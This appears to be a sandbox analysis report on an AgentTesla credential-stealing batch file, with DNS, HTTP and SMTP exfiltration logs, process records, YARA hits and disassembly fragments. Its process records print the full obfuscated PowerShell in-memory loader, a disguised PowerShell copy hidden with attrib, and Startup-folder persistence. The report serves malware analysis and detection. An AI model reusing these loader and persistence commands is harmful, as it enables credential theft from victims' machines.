                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Oct 30, 2024 17:41:16.787117004 CET4989253192.168.2.61.1.1.1
                                                                                                          Oct 30, 2024 17:41:16.798204899 CET53498921.1.1.1192.168.2.6
                                                                                                          Oct 30, 2024 17:41:18.006237984 CET6425653192.168.2.61.1.1.1
                                                                                                          Oct 30, 2024 17:41:19.015213013 CET6425653192.168.2.61.1.1.1
                                                                                                          Oct 30, 2024 17:41:20.025299072 CET6425653192.168.2.61.1.1.1
                                                                                                          Oct 30, 2024 17:41:20.046221018 CET53642561.1.1.1192.168.2.6
                                                                                                          Oct 30, 2024 17:41:20.046236992 CET53642561.1.1.1192.168.2.6
                                                                                                          Oct 30, 2024 17:41:20.046247005 CET53642561.1.1.1192.168.2.6

                                                                                                          DNS Queries

                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Oct 30, 2024 17:41:16.787117004 CET192.168.2.61.1.1.10x4ccaStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 17:41:18.006237984 CET192.168.2.61.1.1.10x2b4eStandard query (0)nffplp.comA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 17:41:19.015213013 CET192.168.2.61.1.1.10x2b4eStandard query (0)nffplp.comA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 17:41:20.025299072 CET192.168.2.61.1.1.10x2b4eStandard query (0)nffplp.comA (IP address)IN (0x0001)false

                                                                                                          DNS Answers

                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Oct 30, 2024 17:41:10.289191008 CET1.1.1.1192.168.2.60x92ceNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 17:41:10.289191008 CET1.1.1.1192.168.2.60x92ceNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 17:41:16.798204899 CET1.1.1.1192.168.2.60x4ccaNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 17:41:20.046221018 CET1.1.1.1192.168.2.60x2b4eNo error (0)nffplp.com163.44.198.71A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 17:41:20.046236992 CET1.1.1.1192.168.2.60x2b4eNo error (0)nffplp.com163.44.198.71A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 17:41:20.046247005 CET1.1.1.1192.168.2.60x2b4eNo error (0)nffplp.com163.44.198.71A (IP address)IN (0x0001)false

                                                                                                          HTTP Request Dependency Graph

                                                                                                          • ip-api.com

                                                                                                          HTTP Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.649737208.95.112.1806196C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 17:41:16.811645031 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                          Host: ip-api.com
                                                                                                          Connection: Keep-Alive
                                                                                                          Oct 30, 2024 17:41:17.400742054 CET174INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 16:41:16 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Content-Length: 5
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          X-Ttl: 60
                                                                                                          X-Rl: 44
                                                                                                          Data Raw: 74 72 75 65 0a
                                                                                                          Data Ascii: true


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.649822208.95.112.1805092C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 17:41:31.764034986 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                          Host: ip-api.com
                                                                                                          Connection: Keep-Alive
                                                                                                          Oct 30, 2024 17:41:32.394145966 CET174INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 16:41:31 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Content-Length: 5
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          X-Ttl: 45
                                                                                                          X-Rl: 43
                                                                                                          Data Raw: 74 72 75 65 0a
                                                                                                          Data Ascii: true


                                                                                                          SMTP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                          Oct 30, 2024 17:41:21.356705904 CET58749757163.44.198.71192.168.2.6220-cpanel16wh.bkk1.cloud.z.com ESMTP Exim 4.96.2 #2 Wed, 30 Oct 2024 23:41:21 +0700
                                                                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                                                                          220 and/or bulk e-mail.
                                                                                                          Oct 30, 2024 17:41:21.357043028 CET49757587192.168.2.6163.44.198.71EHLO 715575
                                                                                                          Oct 30, 2024 17:41:21.723855019 CET58749757163.44.198.71192.168.2.6250-cpanel16wh.bkk1.cloud.z.com Hello 715575 [173.254.250.78]
                                                                                                          250-SIZE 52428800
                                                                                                          250-8BITMIME
                                                                                                          250-PIPELINING
                                                                                                          250-PIPECONNECT
                                                                                                          250-STARTTLS
                                                                                                          250 HELP
                                                                                                          Oct 30, 2024 17:41:21.724169970 CET49757587192.168.2.6163.44.198.71STARTTLS
                                                                                                          Oct 30, 2024 17:41:22.095032930 CET58749757163.44.198.71192.168.2.6220 TLS go ahead
                                                                                                          Oct 30, 2024 17:41:34.179423094 CET58749828163.44.198.71192.168.2.6220-cpanel16wh.bkk1.cloud.z.com ESMTP Exim 4.96.2 #2 Wed, 30 Oct 2024 23:41:33 +0700
                                                                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                                                                          220 and/or bulk e-mail.
                                                                                                          Oct 30, 2024 17:41:34.179703951 CET49828587192.168.2.6163.44.198.71EHLO 715575
                                                                                                          Oct 30, 2024 17:41:34.555011034 CET58749828163.44.198.71192.168.2.6250-cpanel16wh.bkk1.cloud.z.com Hello 715575 [173.254.250.78]
                                                                                                          250-SIZE 52428800
                                                                                                          250-8BITMIME
                                                                                                          250-PIPELINING
                                                                                                          250-PIPECONNECT
                                                                                                          250-STARTTLS
                                                                                                          250 HELP
                                                                                                          Oct 30, 2024 17:41:34.555181980 CET49828587192.168.2.6163.44.198.71STARTTLS
                                                                                                          Oct 30, 2024 17:41:34.934617043 CET58749828163.44.198.71192.168.2.6220 TLS go ahead

                                                                                                          Statistics

                                                                                                          CPU Usage

                                                                                                          Click to jump to process

                                                                                                          Memory Usage

                                                                                                          Click to jump to process

                                                                                                          High Level Behavior Distribution

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          General

                                                                                                          Target ID:0
                                                                                                          Start time:12:41:12
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\87M9Y3P4Z7.bat" "
                                                                                                          Imagebase:0x7ff75ed70000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:1
                                                                                                          Start time:12:41:12
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff66e660000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:2
                                                                                                          Start time:12:41:12
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Windows\System32\chcp.com
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:chcp 65001
                                                                                                          Imagebase:0x7ff608e30000
                                                                                                          File size:14'848 bytes
                                                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:4
                                                                                                          Start time:12:41:12
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo F "
                                                                                                          Imagebase:0x7ff75ed70000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:5
                                                                                                          Start time:12:41:12
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Windows\System32\xcopy.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe
                                                                                                          Imagebase:0x7ff6c8450000
                                                                                                          File size:50'688 bytes
                                                                                                          MD5 hash:39FBFD3AF58238C6F9D4D408C9251FF5
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:6
                                                                                                          Start time:12:41:12
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Windows\System32\attrib.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:attrib +s +h C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe
                                                                                                          Imagebase:0x7ff6a6e50000
                                                                                                          File size:23'040 bytes
                                                                                                          MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:7
                                                                                                          Start time:12:41:12
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\Desktop\87M9Y3P4Z7.bat' | Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"
                                                                                                          Imagebase:0x3f0000
                                                                                                          File size:433'152 bytes
                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2288766679.0000000008820000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2262903919.0000000005095000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2262903919.0000000005095000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2262903919.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2269230872.000000000680D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2269230872.000000000680D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:8
                                                                                                          Start time:12:41:15
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                          Imagebase:0x2b0000
                                                                                                          File size:42'064 bytes
                                                                                                          MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2410949006.0000000000382000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2410949006.0000000000382000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2417476771.0000000002872000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2417476771.000000000284F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2417476771.0000000002823000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2417476771.0000000002823000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:10
                                                                                                          Start time:12:41:25
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Windows\System32\wscript.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbs"
                                                                                                          Imagebase:0x7ff711380000
                                                                                                          File size:170'496 bytes
                                                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:11
                                                                                                          Start time:12:41:26
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ChannelUris.bat" "
                                                                                                          Imagebase:0x7ff75ed70000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:12
                                                                                                          Start time:12:41:26
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff66e660000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:13
                                                                                                          Start time:12:41:26
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Windows\System32\chcp.com
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:chcp 65001
                                                                                                          Imagebase:0x7ff608e30000
                                                                                                          File size:14'848 bytes
                                                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:16
                                                                                                          Start time:12:41:26
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo F "
                                                                                                          Imagebase:0x7ff75ed70000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:17
                                                                                                          Start time:12:41:26
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Windows\System32\xcopy.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe
                                                                                                          Imagebase:0x7ff6c8450000
                                                                                                          File size:50'688 bytes
                                                                                                          MD5 hash:39FBFD3AF58238C6F9D4D408C9251FF5
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:18
                                                                                                          Start time:12:41:27
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Windows\System32\attrib.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:attrib +s +h C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe
                                                                                                          Imagebase:0x7ff6a6e50000
                                                                                                          File size:23'040 bytes
                                                                                                          MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:19
                                                                                                          Start time:12:41:28
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\AppData\Roaming\ChannelUris.bat' | Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"
                                                                                                          Imagebase:0x240000
                                                                                                          File size:433'152 bytes
                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.2444515974.0000000006E93000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.2444515974.0000000006E93000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.2415826466.0000000005783000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.2415826466.0000000005783000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000013.00000002.2415826466.00000000052F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000013.00000002.2444515974.0000000006783000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:20
                                                                                                          Start time:12:41:30
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                          Imagebase:0x7ff799c70000
                                                                                                          File size:42'064 bytes
                                                                                                          MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.4700981421.000000000276E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.4700981421.0000000002791000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.4700981421.0000000002741000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.4700981421.0000000002741000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Has exited:false

                                                                                                          Disassembly

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:9.2%
                                                                                                            Dynamic/Decrypted Code Coverage:75.8%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:33
                                                                                                            Total number of Limit Nodes:2
                                                                                                            execution_graph 33347 89b6103 33348 89b6109 33347->33348 33351 89bcff8 33348->33351 33352 89bd01f 33351->33352 33355 89bd4f8 33352->33355 33356 89bd541 VirtualProtect 33355->33356 33358 89b01d9 33356->33358 33359 89b7e81 33362 89be568 33359->33362 33363 89be57d 33362->33363 33366 89be5b8 33363->33366 33367 89be5df 33366->33367 33370 89be6c0 33367->33370 33371 89be704 VirtualAlloc 33370->33371 33373 89b7ea5 33371->33373 33378 89b0f51 33380 89bcff8 VirtualProtect 33378->33380 33379 89b0f6f 33380->33379 33374 89b5006 33375 89b5025 33374->33375 33377 89bcff8 VirtualProtect 33375->33377 33376 89b504c 33377->33376 33381 251d01c 33382 251d034 33381->33382 33383 251d08f 33382->33383 33385 89bdbe0 33382->33385 33386 89bdc39 33385->33386 33389 89be170 33386->33389 33387 89bdc6e 33390 89be19d 33389->33390 33391 89bcff8 VirtualProtect 33390->33391 33393 89be333 33390->33393 33392 89be324 33391->33392 33392->33387 33393->33387

                                                                                                            Executed Functions

                                                                                                            Function 028BB766 Relevance: 2.7, Strings: 2, Instructions: 249COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 28bb766-28bb771 1 28bb6fe-28bb707 0->1 2 28bb772-28bb778 0->2 3 28bb4a8-28bb4ab 1->3 4 28bb77a 2->4 5 28bb781 2->5 6 28bb4b1 3->6 7 28bb546-28bb561 3->7 8 28bb7ca-28bb7e2 4->8 9 28bb85e-28bb886 4->9 10 28bbb49-28bbb57 4->10 11 28bb7e9-28bb802 4->11 12 28bba39-28bba46 4->12 13 28bba0d-28bba27 4->13 14 28bb8a2-28bb8a6 4->14 15 28bbad0 4->15 16 28bb8c7-28bb8cc 4->16 17 28bb8d6-28bb8f1 4->17 18 28bb786-28bb798 4->18 5->8 5->9 6->7 20 28bb4fb-28bb505 6->20 21 28bb6fa-28bb707 6->21 22 28bb4b8-28bb4da 6->22 23 28bb4de-28bb4f9 6->23 24 28bb61d-28bb64d 6->24 25 28bb653-28bb6f9 6->25 26 28bb522 6->26 27 28bb5c0-28bb5f6 call 28b9654 6->27 28 28bb566-28bb56f 6->28 29 28bb506-28bb520 call 28bbe50 6->29 30 28bb595-28bb5bc call 28b1634 6->30 68 28bb4a6 7->68 8->2 83 28bbb0a-28bbb24 9->83 84 28bb88c-28bb893 9->84 10->2 11->2 19 28bb808-28bb80f 11->19 12->17 54 28bba4c-28bba53 12->54 13->2 34 28bba2d-28bba34 13->34 31 28bb898-28bb89d 14->31 32 28bb8a8-28bb8af 14->32 33 28bbca8-28bbcbf 16->33 17->2 56 28bb7a0-28bb7b9 18->56 19->2 21->3 22->3 78 28bb4dc 22->78 23->3 75 28bb64f-28bb651 24->75 76 28bb611-28bb614 24->76 25->21 45 28bb528-28bb539 26->45 85 28bb5fc-28bb60a 27->85 47 28bb575-28bb585 28->47 29->68 61 28bb589-28bb58c 30->61 79 28bb5be 30->79 31->14 42 28bbc71-28bbc8a 31->42 32->2 33->2 36 28bbcc5-28bbcca 33->36 34->2 36->2 42->2 46 28bbc90-28bbc97 42->46 45->3 57 28bb53f-28bb541 45->57 46->2 46->33 47->61 62 28bb587 47->62 54->2 56->2 66 28bb7bb-28bb7c2 56->66 57->3 61->30 70 28bb58e 61->70 62->61 66->2 68->3 70->24 70->25 70->27 70->30 75->76 76->25 81 28bb616 76->81 78->3 79->61 81->24 81->25 83->10 85->76 86 28bb60c 85->86 86->76
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2262171066.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_28b0000_87M9Y3P4Z7.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: #$&
                                                                                                            • API String ID: 0-3870246384
                                                                                                            • Opcode ID: 5a86f8beab5aa4b54ff38522782a33e02e31558518f810bb1e2891118b5f4eba
                                                                                                            • Instruction ID: 129004a362243e06df87892c7a7b9bcd041094cf270e893b71d95e5d16b6df4a
                                                                                                            • Opcode Fuzzy Hash: 5a86f8beab5aa4b54ff38522782a33e02e31558518f810bb1e2891118b5f4eba
                                                                                                            • Instruction Fuzzy Hash: 8AB11878A01108CFDB05CFA9D488BEDBBB2FF89308F1480A9D906E7761DB759846CB55
                                                                                                            Function 088CC6D0 Relevance: 2.4, Strings: 1, Instructions: 1176COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2289353636.00000000088C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_88c0000_87M9Y3P4Z7.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4
